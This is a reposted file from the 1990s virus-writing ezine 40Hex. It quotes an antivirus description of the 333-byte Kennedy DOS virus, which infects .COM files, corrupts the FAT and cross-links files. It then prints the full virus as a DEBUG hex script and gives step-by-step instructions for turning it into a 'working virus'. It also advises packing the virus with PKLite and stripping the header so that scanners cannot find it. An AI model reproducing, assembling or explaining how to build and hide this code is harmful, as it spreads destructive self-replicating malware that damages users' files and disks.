Copy Link
Add to Bookmark
Report

40Hex Issue 06 File 007

eZine's profile picture
Published in 
40Hex
 · 13 Jul 2024

40Hex Number 6 Volume 2 Issue 2                                      File 007 


Lets see what good ole' Patty has to say about this:


Virus Name: Kennedy
Aliases: Dead Kennedy, 333, Kennedy-333
Scan ID: [Kennedy]
V Status: Endangered
Discovered: April, 1990
Symptoms: .COM growth; message on trigger dates (see text);
crosslinking of files; lost clusters; FAT corruption
Origin: Denmark
Eff Length: 333 Bytes
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
General Comments:
The Kennedy virus was isolated in April 1990. It is a generic
infector of .COM files, including COMMAND.COM.

This virus has three activation dates: June 6 (assassination of
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
and November 22 (assassination of John F. Kennedy 1963) of any year.
On activation, the virus will display a message the following
message:

"Kennedy is dead - long live 'The Dead Kennedys'"

The following text strings can be found in the viral code:

"\command.com"
"The Dead Kennedys"

Systems infected with the Kennedy virus will experience
cross-linking of files, lost clusters, and file allocation table
errors (including messages that the file allocation table is bad).


--------------------------------Cut Here------------------------------------

n kennedy.com
e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
rcx
027F
w
q

---------------------------------Cut Here-----------------------------------


Ok there it is. Not the most impressive virus around and its caught by just
about every scan on the market, but take PKLite to it and then remove the PKLite
header (Use NOLITE in this issue) and no one will be able to find it. Anyway it
gets the job done.

To make the above hex into a working file, first cut on the dotted lines.
Name the resulting file KENNEDY.TXT.
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.


-Instigator

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT